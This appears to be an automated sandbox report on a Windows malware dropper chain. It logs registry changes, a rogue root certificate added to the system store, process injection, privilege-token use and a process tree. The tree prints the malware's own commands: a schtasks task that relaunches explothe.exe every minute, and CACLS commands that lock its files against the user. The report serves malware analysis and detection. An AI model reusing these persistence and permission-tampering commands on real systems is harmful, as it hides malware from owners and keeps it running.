Set value (int) \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{D5ACD161-67AD-11EE-9FC1-4E9D0FD57FD1} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\FaviconURLFallback = "http://www.bing.com/favicon.ico" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\TopResultURLFallback = "http://www.bing.com/search?q={searchTerms}&src=IE-TopResult&FORM=IETR02" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-222 = "Alaskan Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-41 = "E. South America Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-435 = "Georgian Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-434 = "Georgian Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-362 = "GTB Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-741 = "New Zealand Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-422 = "Russian Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-411 = "E. Africa Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-491 = "India Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-31 = "Mid-Atlantic Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-241 = "Samoa Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-672 = "AUS Eastern Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-412 = "E. Africa Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-752 = "Tonga Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-103 = "Microsoft Corporation" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-281 = "Central Europe Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-682 = "E. Australia Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-771 = "Montevideo Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-92 = "Pacific SA Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-831 = "SA Eastern Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-122 = "SA Pacific Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1412 = "Syria Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-101 = "Provides DHCP based enforcement for NAP" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-21 = "Cape Verde Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-872 = "Pakistan Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-101 = "Provides Network Access Protection enforcement for EAP authenticated network connections, such as those used with 802.1X and VPN technologies." C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-12 = "Azores Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-891 = "Morocco Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-511 = "Central Asia Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-982 = "Kamchatka Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-211 = "Pacific Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-791 = "SA Western Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-301 = "Romance Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-532 = "Sri Lanka Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1041 = "Ulaanbaatar Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-171 = "Central Daylight Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-331 = "E. Europe Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-502 = "Nepal Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-91 = "Pacific SA Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-382 = "South Africa Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-381 = "South Africa Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-172 = "Central Standard Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-332 = "E. Europe Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-732 = "Fiji Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-192 = "Mountain Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-541 = "Myanmar Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-142 = "Canada Central Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-431 = "Iran Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-582 = "North Asia East Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1042 = "Ulaanbaatar Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-100 = "DHCP Quarantine Enforcement Client" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-141 = "Canada Central Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-51 = "Greenland Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-272 = "Greenwich Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-981 = "Kamchatka Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-214 = "Pacific Daylight Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-842 = "Argentina Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 C:\Windows\rss\csrss.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 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 C:\Windows\rss\csrss.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\96E7.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\source1.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1CAE.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\rss\csrss.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2440 wrote to memory of 2044 N/A C:\Users\Admin\AppData\Local\Temp\19a6a588083633421ed63b0f889a6adfc7496bb4b02a23f9044678b1537df4b1.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3917847.exe
PID 2044 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3917847.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a2851806.exe
PID 2652 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a2851806.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2652 wrote to memory of 2780 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a2851806.exe C:\Windows\SysWOW64\WerFault.exe
PID 1204 wrote to memory of 3068 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\8EC8.exe
PID 3068 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\8EC8.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WU8aU7xW.exe
PID 1204 wrote to memory of 2588 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\8FF1.exe
PID 2520 wrote to memory of 1640 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WU8aU7xW.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\sh6hE7ZX.exe
PID 1204 wrote to memory of 2244 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\9169.bat
PID 2244 wrote to memory of 2916 N/A C:\Users\Admin\AppData\Local\Temp\9169.bat C:\Windows\system32\cmd.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\19a6a588083633421ed63b0f889a6adfc7496bb4b02a23f9044678b1537df4b1.exe

"C:\Users\Admin\AppData\Local\Temp\19a6a588083633421ed63b0f889a6adfc7496bb4b02a23f9044678b1537df4b1.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3917847.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3917847.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a2851806.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a2851806.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2652 -s 36

C:\Users\Admin\AppData\Local\Temp\8EC8.exe

C:\Users\Admin\AppData\Local\Temp\8EC8.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WU8aU7xW.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WU8aU7xW.exe

C:\Users\Admin\AppData\Local\Temp\8FF1.exe

C:\Users\Admin\AppData\Local\Temp\8FF1.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\sh6hE7ZX.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\sh6hE7ZX.exe

C:\Users\Admin\AppData\Local\Temp\9169.bat

"C:\Users\Admin\AppData\Local\Temp\9169.bat"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\91A5.tmp\91A6.tmp\91A7.bat C:\Users\Admin\AppData\Local\Temp\9169.bat"

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Ly3QD9BA.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Ly3QD9BA.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2588 -s 132

C:\Users\Admin\AppData\Local\Temp\933E.exe

C:\Users\Admin\AppData\Local\Temp\933E.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\Hq4pv4zr.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\Hq4pv4zr.exe

C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\1oS28ea9.exe

C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\1oS28ea9.exe

C:\Users\Admin\AppData\Local\Temp\96E7.exe

C:\Users\Admin\AppData\Local\Temp\96E7.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 280 -s 132

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 476 -s 280

C:\Users\Admin\AppData\Local\Temp\9B4B.exe

C:\Users\Admin\AppData\Local\Temp\9B4B.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:R" /E

C:\Users\Admin\AppData\Local\Temp\C6FD.exe

C:\Users\Admin\AppData\Local\Temp\C6FD.exe

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

